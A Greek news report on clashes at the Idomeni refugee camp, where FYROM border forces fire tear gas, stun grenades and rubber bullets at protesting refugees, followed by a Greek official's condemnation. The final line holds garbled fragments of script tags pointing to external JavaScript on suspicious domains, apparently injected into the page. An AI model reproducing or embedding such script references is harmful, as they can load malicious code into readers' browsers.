Ειδομένη: Χημικά και πλαστικές σφαίρες κατά προσφύγων από δυνάμεις της ΠΓΔΜ [Φωτογραφίες & video]

metanasteseidomeni

Ένταση και σοβαρά επεισόδια βρίσκονται σε εξέλιξη από το πρωί της Κυριακής στην Ειδομένη.

Οι πρόσφυγες που έχουν εγκλωβιστεί στον καταυλισμό της Ειδομένης πραγματοποιούν διαμαρτυρία μπροστά από τον φράκτη που χωρίζει την Ελλάδα και την ΠΓΔΜ, ζητώντας να ανοίξουν τα σύνορα και να συνεχίσουν το ταξίδι τους προς την Ευρώπη.

Η ένταση ξεκίνησε γύρω στις 11.30 το πρωί, όταν πενταμελής αντιπροσωπεία τους κινήθηκε προς τον φράκτη, στην πλευρά της ΠΓΔΜ και επιχείρησε να διαπραγματευτεί με τις αστυνομικές αρχές της γειτονικής χώρας, προκειμένου να τους επιτραπεί να περάσουν τα σύνορα και να συνεχίσουν το ταξίδι τους. Καθώς δεν υπήρξε ανταπόκριση στο αίτημα, περίπου 500 πρόσφυγες κινήθηκαν προς τον φράκτη, εξωτερικά των σιδηροδρομικών γραμμών, προσπαθώντας να τον περάσουν και ακολούθησε διαμαρτυρία. Οι πρόσφυγες πέταξαν πέτρες κι άλλα αντικείμενα προς την άλλη πλευρά του φράκτη.

Οι δυνάμεις των Σκοπίων που βρίσκονται παρατεταγμένες στο φράκτη απέτρεψαν τους πρόσφυγες ρίχνοντας χημικά και χειροβομβίδες κρότου – λάμψης. Πρόσφυγες έδειξαν σε δημοσιογράφους που βρίσκονται στην περιοχή και πλαστικές σφαίρες που οι συνοριοφύλακες της ΠΓΔΜ έριξαν εναντίον τους. Μάλιστα οι δυνάμεις της γειτονικής χώρας έριξαν με αύρες χημικά και μέσα στον καταυλισμό, όπου βρίσκονται συγκεντρωμένοι χιλιάδες άνθρωποι. Σαν να μην έφτανε αυτό, η αλλαγή στη φορά του ανέμου την τελευταία ώρα φέρνει το νέφος των χημικών από τον φράκτη στον καταυλισμό, κάνοντας την ατμόσφαιρα αποπνικτική.

Δεκάδες από τους συγκεντρωμένους έχουν τραυματιστεί ή αντιμετωπίζουν αναπνευστικά προβλήματα. Πολλοί φέρουν εκδορές και κατάγματα που έγιναν κατά την προσπάθεια τους να ρίξουν τον φράκτη.Ανάμεσα τους γυναίκες και μικρά παιδιά.

Αφορμή για τη σημερινή ένταση υπήρξε ένα ακόμη φυλλάδιο γραμμένο στην αραβική γλώσσα, το οποίο κυκλοφόρησε εχθές στην Ειδομένη και καλούσε τους πρόσφυγες σε μαζικό πέρασμα από τα σύνορα σήμερα το πρωί.

Κυρίτσης: Καταδικαστέα η χρήση βίας εναντίον προσφύγων

«Η χρήση χημικών, σφαιρών από καουτσούκ και βομβίδων κρότου λάμψης από τις δυνάμεις της ΠΓΔΜ, άνευ διακρίσεων, εναντίον ευάλωτων πληθυσμών, και μάλιστα χωρίς να συντρέχουν λόγοι ανωτέρας βίας, είναι πρακτική επικίνδυνη και καταδικαστέα», τόνισε ο εκπρόσωπος του Συντονιστικού για το Προσφυγικό, Γιώργος Κυρίτσης σε δήλωσή του στο ΑΠΕ-ΜΠΕ.

«Καλούμε τις αρχές της ΠΓΔΜ να αντιληφθούν τους δυνητικούς κινδύνους που εγκυμονεί η χρήση βίας εναντίον προσφύγων και μεταναστών.  Καλούμε επίσης τους πρόσφυγες να μην πιστεύουν τις φήμες και τις ψευδείς πληροφορίες που διακινούν με εγκληματική ανευθυνότητα άγνωστοι, και να συνεργαστούν με τις ελληνικές αρχές που εγγυώνται την ασφαλή μετακίνησή τους στους οργανωμένους χώρους προσωρινής φιλοξενίας», σημείωσε ο κ. Κυρίτσης.

Στο μεταξύ, κύκλοι του υπουργείου Εθνικής Αμύνης διέψευσαν φήμες που ανέφεραν ότι οι δυνάμεις ασφαλείας της ΠΓΔΜ εισήλθαν σε ελληνικό έδαφος.

Δείτε βίντεο από το σημείο:

___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>challengeforme.com/pystats.js’ async=true >challengeforme.com/pystats.js’ async=true >‘ >‘ >‘ >‘ >‘ >‘ >‘ >‘ >